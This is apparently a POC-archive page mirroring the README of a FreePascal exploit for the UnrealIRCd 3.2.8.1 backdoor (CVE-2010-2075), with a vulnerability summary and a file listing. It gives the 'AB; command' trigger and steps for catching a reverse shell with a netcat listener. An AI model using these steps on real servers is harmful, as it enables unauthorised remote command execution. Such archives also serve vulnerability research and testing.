POC详情: 949436c6843934d09423c54fef334bf239e27d2c

来源
https://github.com/MFernstrom/OffensivePascal-CVE-2010-2075
关联漏洞
标题: UnrealIRCd 后门未授权访问漏洞 (CVE-2010-2075)
描述:2009年11月到2010年6月间分布于某些镜面站点的UnrealIRCd,在DEBUG3_DOLOG_SYSTEM宏中包含外部引入的修改(特洛伊木马),远程攻击者可执行任意命令。
描述
FreePascal implementation of the UnrealIRCD CVE-2010-2075
介绍
# CVE-2010-2075
FreePascal implementation of CVE-2010-2075

## Vulnerability
### UnrealIRCd 3.2.8.1
RCE by sending "`AB; command`" to any listening service. Any command you send is executed by the same user as UnrealIRCD runs as.

This implementation launches a reverse shell to your listener.

#### Step 1
Start a listener, ex. `netcat -lvp 4444`

#### Step 2
Execute exploit `./exploit <target ip> <target port> <host ip> <host port>` where host ip and port is where your listener is running

## Requirements
Synapse. If you don't have it, install through the OPM
文件快照

 [4.0K]  /data/pocs/949436c6843934d09423c54fef334bf239e27d2c
├── [1.7K]  exploit.lpi
├── [1.1K]  exploit.lpr
├── [ 11K]  LICENSE
└── [ 566]  README.md

0 directories, 4 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。